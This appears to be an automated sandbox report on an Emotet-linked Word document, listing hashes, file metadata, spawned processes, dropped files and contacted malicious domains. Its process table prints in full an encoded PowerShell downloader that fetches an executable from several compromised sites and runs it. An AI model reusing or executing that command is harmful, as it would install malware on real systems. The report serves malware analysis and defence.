File name: | [email protected] |
Full analysis: | https://app.any.run/tasks/21c57cce-bb34-4056-9a44-92927a9655a9 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | November 21, 2021, 19:15:04 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.openxmlformats-officedocument.wordprocessingml.document |
File info: | Microsoft Word 2007+ |
MD5: | B92021CA10AED3046FC3BE5AC1C2A094 |
SHA1: | 0FB1AD5B53CDD09A7268C823EC796A6E623F086F |
SHA256: | C378387344E0A552DC065DE6BFA607FD26E0B5C569751C79FBF9C6F2E91C9807 |
SSDEEP: | 3072:/Msknok2er/yR5DpQKajNDu1CkBwN0pqJfWSq:zkoRoKDpQZqQkmN0scR |
.docm | | | Word Microsoft Office Open XML Format document (with Macro) (53.6) |
---|---|---|
.docx | | | Word Microsoft Office Open XML Format document (24.2) |
.zip | | | Open Packaging Conventions container (18) |
.zip | | | ZIP compressed archive (4.1) |
AppVersion: | 16 |
---|---|
HyperlinksChanged: | No |
SharedDoc: | No |
CharactersWithSpaces: | 445 |
LinksUpToDate: | No |
Company: | - |
ScaleCrop: | No |
Paragraphs: | 1 |
Lines: | 3 |
DocSecurity: | None |
Application: | Microsoft Office Word |
Characters: | 380 |
Words: | 66 |
Pages: | 1 |
TotalEditTime: | - |
Template: | Normal.dotm |
ModifyDate: | 2019:09:16 12:22:00Z |
CreateDate: | 2019:09:16 12:22:00Z |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Keywords: | - |
Description: | - |
---|---|
Creator: | - |
Subject: | - |
Title: | - |
ZipFileName: | [Content_Types].xml |
---|---|
ZipUncompressedSize: | 3939 |
ZipCompressedSize: | 524 |
ZipCRC: | 0x247a0b47 |
ZipModifyDate: | 1980:01:01 00:00:00 |
ZipCompression: | Deflated |
ZipBitFlag: | 0x0006 |
ZipRequiredVersion: | 20 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3296 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\[email protected]" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | Explorer.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2152 | powershell -enco JABqAHIARgBoAEEAMAA9ACcAVwBmADEAcgBIAHoAJwA7ACQAdQBVAE0ATQBMAEkAIAA9ACAAJwAyADgANAAnADsAJABpAEIAdABqADQAOQBOAD0AJwBUAGgATQBxAFcAOABzADAAJwA7ACQARgB3AGMAQQBKAHMANgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAdQBVAE0ATQBMAEkAKwAnAC4AZQB4AGUAJwA7ACQAUwA5AEcAegBSAHMAdABNAD0AJwBFAEYAQwB3AG4AbABHAHoAJwA7ACQAdQA4AFUAQQByADMAPQAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AYgBqAGUAYwB0ACcAKQAgAE4AZQBUAC4AdwBFAEIAQwBsAEkARQBuAHQAOwAkAHAATABqAEIAcQBJAE4ARQA9ACcAaAB0AHQAcAA6AC8ALwBiAGwAbwBjAGsAYwBoAGEAaQBuAGoAbwBiAGwAaQBzAHQALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvADAAMQA0ADAAOAAwAC8AQABoAHQAdABwAHMAOgAvAC8AdwBvAG0AZQBuAGUAbQBwAG8AdwBlAHIAbQBlAG4AdABwAGEAawBpAHMAdABhAG4ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHAAYQBiAGEANQBxADUAMgAvAEAAaAB0AHQAcABzADoALwAvAGEAdABuAGkAbQBhAG4AdgBpAGwAbABhAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AMAA3ADMANwAzADUALwBAAGgAdAB0AHAAcwA6AC8ALwB5AGUAdQBxAHUAeQBuAGgAbgBoAGEAaQAuAGMAbwBtAC8AdQBwAGwAbwBhAGQALwA0ADEAOAAzADAALwBAAGgAdAB0AHAAcwA6AC8ALwBkAGUAZQBwAGkAawBhAHIAYQBpAC4AYwBvAG0ALwBqAHMALwA0AGIAegBzADYALwAnAC4AIgBzAFAATABgAGkAVAAiACgAJwBAACcAKQA7ACQAbAA0AHMASgBsAG8ARwB3AD0AJwB6AEkAUwBqAEUAbQBpAFAAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFYAMwBoAEUAUABNAE0AWgAgAGkAbgAgACQAcABMAGoAQgBxAEkATgBFACkAewB0AHIAeQB7ACQAdQA4AFUAQQByADMALgAiAEQATwB3AGAATgBgAGwATwBhAEQAZgBpAGAATABlACIAKAAkAFYAMwBoAEUAUABNAE0AWgAsACAAJABGAHcAYwBBAEoAcwA2ACkAOwAkAEkAdgBIAEgAdwBSAGkAYgA9ACcAcwA1AFQAcwBfAGkAUAA4ACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlACcAKwAnAHQALQBJAHQAZQBtACcAKQAgACQARgB3AGMAQQBKAHMANgApAC4AIgBMAGUATgBgAGcAVABoACIAIAAtAGcAZQAgADIAMwA5ADMAMQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYABBAHIAVAAiACgAJABGAHcAYwBBAEoAcwA2ACkAOwAkAHoARABOAHMAOAB3AGkAPQAnAEYAMwBXAHcAbwAwACcAOwBiAHIAZQBhAGsAOwAkAFQAVABKAHAAdABYAEIAPQAnAGkAagBsAFcAaABDAHoAUAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJAB2AFoAegBpAF8AdQBBAHAAPQAnAGEARQBCAHQAcABqADQAJwA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
968 | "C:\Windows\system32\ntvdm.exe" -i1 | C:\Windows\system32\ntvdm.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: NTVDM.EXE Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3296 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR166D.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3296 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\[email protected] | pgc | |
MD5:5E6044E97F1C4BDAAF16B5DA6279997D | SHA256:6270E0AD563A5C7B5090E4CCF1B7A1A92E34A4D8D1B3D92F96A6E9779FFDEC57 | |||
3296 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:3656172ECE5D5D52FAA94F1C603083D6 | SHA256:8115F3FE078B4EC6C179BC53ED9407DD1FD0A04D9B4D503763A49099D2D9E8B5 | |||
3296 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\375E43EC.dat | image | |
MD5:B968160E32B2FBEBB3FF6C55F5B4885B | SHA256:7CF4AE188785F7C0E5E4A1D5BDAC0B52BC65D3AA46513022A9E35489765C19C9 | |||
3296 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\93B6FB42.dat | image | |
MD5:C1F138C3F19B5545D60B3B5D4C2BA4FC | SHA256:80C4552EC9FED881E1806AA55368D3428832F52157AB8D92E7FB531658961A3E | |||
3296 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2AA0FCA0.dat | image | |
MD5:B2B55276284D41BAA290155CB55A94E2 | SHA256:C08D5EC45948BDE7FBA129C2BD1A6BF2816015DA7BC0B8BC76DE8F8F3727D2CD | |||
3296 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\98D539F8.dat | image | |
MD5:23EE1904F10A3641361F163E000DFF66 | SHA256:58D13515C530476E847D64718305B845B4110F87C88C7761BA9A053653499001 | |||
3296 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E7E29814.dat | image | |
MD5:48D1B152FC6F014B9C45DBB5A7941F4D | SHA256:61CBDA84CEB5254E134CB6F59EA9D73812B48EF380298D53AEE6CC09BAA966F3 | |||
3296 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9A830BD7.wmf | image | |
MD5:A53FD310182B8DA14BE0E22A440105EA | SHA256:52A469268392E4252E6EF7F8D42BE5F6A02BE7C3383E5E71D94E0789591FF1DC | |||
3296 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\40458E9F.wmf | image | |
MD5:47494691A7204F143E5910EF1947C99E | SHA256:CDFB8B2FF4202BC86346915D1EBDE4E45AB67E40E50EE8D0529D4D7FC4EEC759 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2152 | powershell.exe | GET | 301 | 173.198.248.218:80 | http://www.deepikarai.com/bangalore-escorts.php | US | html | 256 b | malicious |
2152 | powershell.exe | GET | 200 | 208.91.197.27:80 | http://blockchainjoblist.com/wp-admin/014080/ | US | html | 18.0 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2152 | powershell.exe | 208.91.197.27:80 | blockchainjoblist.com | Confluence Networks Inc | US | malicious |
2152 | powershell.exe | 173.198.248.218:80 | deepikarai.com | Turnkey Internet Inc. | US | unknown |
2152 | powershell.exe | 78.41.204.28:443 | yeuquynhnhai.com | Snel.com B.V. | NL | malicious |
2152 | powershell.exe | 173.198.248.218:443 | deepikarai.com | Turnkey Internet Inc. | US | unknown |
Domain | IP | Reputation |
---|---|---|
blockchainjoblist.com |
| malicious |
womenempowermentpakistan.com |
| malicious |
atnimanvilla.com |
| malicious |
yeuquynhnhai.com |
| malicious |
deepikarai.com |
| suspicious |
www.deepikarai.com |
| unknown |